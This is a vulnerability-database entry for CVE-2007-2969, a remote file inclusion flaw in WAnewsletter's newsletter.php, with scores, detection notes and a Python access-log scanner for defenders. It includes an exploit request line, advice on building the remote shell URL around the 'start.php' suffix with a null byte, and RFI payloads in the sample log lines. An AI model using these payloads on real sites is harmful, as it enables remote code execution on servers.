CVE-2007-2969
published 2007-06-01

Priority P259 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 61.73% (99.1th percentile)
PHP remote file inclusion vulnerability in newsletter.php in WAnewsletter 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the waroot parameter.

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wanewsletter | wanewsletter | <= 2.1.3 | |

Detection & IOCs (extracted from sources)

path: /newsletter/newsletter.php
url: http://script.emanual.ru/get?i=1053
command: [Path]/newsletter/newsletter.php?waroot=shell
  • Monitor HTTP requests targeting newsletter.php that carry a URL-like or remote path value in the 'waroot' GET parameter, which indicates a remote file inclusion attempt.
  • The vulnerable code sink is a require_once() call using the unsanitized waroot parameter; look for waroot values containing 'http://' or 'https://' in web server logs.
  • The exploit payload appends 'start.php' to the attacker-supplied waroot value, so the remote shell URL must be crafted to account for this suffix (e.g., using a null byte or query string terminator).
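
The log check described in the bullets above, as an added example (not code from the original page or from WAnewsletter). It goes slightly beyond the bullets by also matching other URL schemes, protocol-relative values and nested percent-encoding, and it flags a decoded null byte; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Matches 'http://', 'https://', 'ftp://', ... and protocol-relative '//host'.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (bounded) so %2568ttp%253A... is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return the findings for one access-log line; an empty list means clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not unquote(target.path).lower().endswith("/newsletter.php"):
        return []
    findings = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != "waroot":          # PHP request keys are case-sensitive
            continue
        value = fully_decode(value)   # parse_qsl already decoded one layer
        if REMOTE_RE.match(value):
            findings.append("remote-url")
        if "\x00" in value:
            findings.append("null-byte")
    return findings

# Constructed sample log lines (documentation addresses and host names only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2007:10:00:00 +0000] "GET /newsletter/newsletter.php?waroot=./ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2007:10:00:05 +0000] "GET /newsletter/newsletter.php?waroot=http://host.example/inc/ HTTP/1.0" 200 87',
    '198.51.100.7 - - [01/Jun/2007:10:00:09 +0000] "GET /newsletter/newsletter.php?waroot=%2568ttps%253A%252F%252Fhost.example%252F HTTP/1.0" 200 87',
    '203.0.113.4 - - [01/Jun/2007:10:01:00 +0000] "GET /newsletter/newsletter.php?waroot=inc/%00 HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jun/2007:10:02:00 +0000] "GET /index.php?waroot=http://host.example/ HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(check_line(entry) or "clean", "|", entry)
```

Only GET query strings are inspected here; a waroot value sent in a POST body does not appear in a standard access log and needs request-body logging or a WAF rule instead.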